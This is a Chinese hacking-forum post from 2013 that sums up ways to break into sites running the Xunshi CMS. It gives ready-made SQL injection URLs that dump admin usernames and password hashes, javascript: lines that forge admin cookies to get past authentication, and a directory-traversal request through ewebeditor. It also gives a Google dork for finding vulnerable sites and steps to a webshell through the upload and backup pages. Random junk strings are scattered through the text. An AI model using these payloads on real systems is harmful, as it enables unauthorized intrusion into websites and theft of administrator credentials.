找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2667|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
8 E) r+ `0 W: Z4 G
+ f  |; g: T0 _5 n, n在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
* k: w, G8 e' ~, a5 b3 q, L' Q
. ]4 F) \+ ~6 F% G以下本文总结来自黑防去年第9期杂志上的内容...
, r' p; e! {% N0 Y+ p
  ?! F; S/ p$ b0 N' z9 O3 u  G先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%1 q. m! w/ ^" E4 k/ b- B! T' J

5 y4 r* M: ^2 k) }/ z, v: W8 ^( L) J26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
+ Y& G! g6 d4 f! t; \# G% o0 B
2 a, g8 u' z$ h2 {$ a  {2 f记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况5 @: n4 l" |, H" ~( i$ M! O5 X+ I% R
这里一个注入
) j7 H4 d5 B' r8 A! }. S, g' U1 o# V) l' q
效果如图:
  U& }7 ~& }+ g0 T2 S
1 u1 m9 Q  V8 a# U. K  j ' b% o7 K% j3 D' g- x% h

9 X+ a( P! O+ E. z4 a- E& E这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.3 M3 }  F0 n: }- J8 T4 R
# g) L6 l0 q9 o; `  E
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去, f: {7 E2 L$ V& c% u0 T

8 {3 k/ f  q8 fjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
! P: R# u$ l  X, g1 v) D) B7 |; {
% T8 p$ k& w4 j; F; ]+ d" C那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
, x: {6 t5 @3 `6 P$ j8 j' Q9 A- l" b& o! T( P7 V% U
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞/ e: R5 k0 _# w7 ^  Z( T# i8 }: x
5 Q  z( C. W' {! ]% L
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以+ ^- {5 G3 [, F0 P
/ `4 h0 \& v/ d3 U( V! H( D
访问这页面来列目录..步骤如下:4 e) Y4 Z; e) x5 [) e; q# n- s

) h! j5 U# o6 I( \javascript:alert(document.cookie="admindj=1")
! Z6 Y, s# w1 {: O1 h
3 \8 _' A7 j7 J/ x% L3 fhttp://www.political-security.co ... asp?id=46&dir=../..- ~& f4 H3 A: p7 W( P5 ?! ?
% I% |( e% }& ?4 e2 M9 J
效果如图:2 ?6 f# @* C1 P) J6 H

. f  E3 t. f- Z; z3 a5 P
3 P! I' m5 M! m3 Z7 i
$ v# t" w- d: N8 Q. R. {0 h这样全站目录都能瞧了..找到后台目录..进去..
" N% B% g+ v, D
$ ^8 Z( [8 C- ~* Q6 W+ Y2 ^那么进了后台怎么拿shell??上传--备份就ok了..1 t# u5 e9 `0 B; X9 m; V# n/ J

' C3 q1 Z" L3 }; y6 J& Z那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..' L+ k: w. d; T) D

2 T% @% Z+ O( I# p这个我也碰到过一次..你都可以通过列目录来实现..& Y' X4 t' F0 _4 q$ ~0 X# E
4 B+ i; F9 Z8 r6 N0 o+ ?! }1 [; l
javascript:alert(document.cookie="admindj=1")
. n" c) D0 c* d9 I5 V; r6 i0 S5 J2 k( c9 b
http://www.political-security.co ... p?action=BackupData
2 a: F2 i: `9 G/ `1 n3 e
/ x; @  ^7 }. T, ]( ]( o备份ok..6 N* Z9 C) y4 U" b+ K4 L& k* t

" K8 m. p* |: w8 W那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?+ `$ o+ B% U4 z5 U2 b
! C' F% H8 |, W! ^6 I: x
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下' }: ^2 t. R0 b; v; ?1 ~+ _7 S2 S# E
- g/ a1 [" ~( |
然后访问此页面进行注入..步骤如下:+ o' Q* L+ F# W

8 a0 t. Z. [- g2 Q( G( Jjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1"). w" E% `& e& d

% r- W& j8 A! p1 w' n然后请求admin/admin_chk.asp页面9 K) K/ @3 x6 y4 O! F8 t

" R0 t) ^* `. l; I7 a输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%" ]  Y$ P+ Y6 i! H6 [" J

" y. {% H# ^. B  ?. H* u4 O5 w26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
* q& X+ P$ L% n: w  t, g' t  k" _$ i9 R) ^! e7 O
效果如图所示:4 {1 `* {0 F, s) {

# {% t9 f2 Y  n2 }2 u7 R
0 Z1 a/ T8 v/ a9 n
7 p2 O( k3 k# S, C1 {讯时漏洞24 }% ]$ Q& q. d
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧). I$ D( K' n! ]( j
& I8 B0 q- a" v) I2 _
1、/admin/admin_news_pl_view.asp?id=19 {6 b0 ~, K) X2 a$ M. Q7 d- s
//id任意 填入以下语句; d3 m: ]7 b; V6 |: L3 k
% I6 R2 e7 N( ]: J$ I8 |
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
) ~# T# {' x1 T+ D; i# _$ g9 {: k + ]- Q# M7 ~8 h# G
* @3 Q: w9 {$ W! I+ J

; s2 ]3 v. v5 \, w5 N3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
( @5 N, S8 e7 }+ d6 X  i( _; d : Z; W: B* `- T! Z# Q4 g; [
( K1 O3 f$ a0 M9 R9 k

5 l8 J: p# A- l6 w( o( {爆出管理员帐号和密码了
4 a8 j+ ]6 U4 r1 t3 S8 I2 K ; @" m1 l+ V: ]/ p  E9 Y; c) N; {4 B
9 J0 ?6 x( f' b. K8 p: w1 ^- N
9 W2 `# M3 J# \) H1 v! P( b, B8 L
4、cookies进后台
2 u* c$ Q) ]4 r+ m# x: o
& T  u7 l% d7 O7 Pjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
$ d) l2 I" D- O; j
6 E8 I" m7 g7 A  W8 r* N1 X7 V7 z- x6 _& u1 U

' `; x1 o7 f/ ]4 J# A6 f5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!" j" s; P+ K. u. h1 O- q3 x

0 r2 v% ~1 j6 \
2 G$ ^, L3 Z, L4 z% s* q% a# P
6 P* k  @& p/ o! u" ?- {6、后台有上传和备份取SHELL不难。
* h4 ^* A: N# V  A0 L7 Q
0 g% C8 I% U7 k# I' a' c7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../.., v% n% C& m& A  \0 \
6 ~/ v1 ]- G  f
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!. T1 K& g' Q' P# g1 O

$ X% N" t# b0 U5 m2 d( H- v) n6 _( U3 }

9 Z, B- F3 @5 f) J% z/ a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表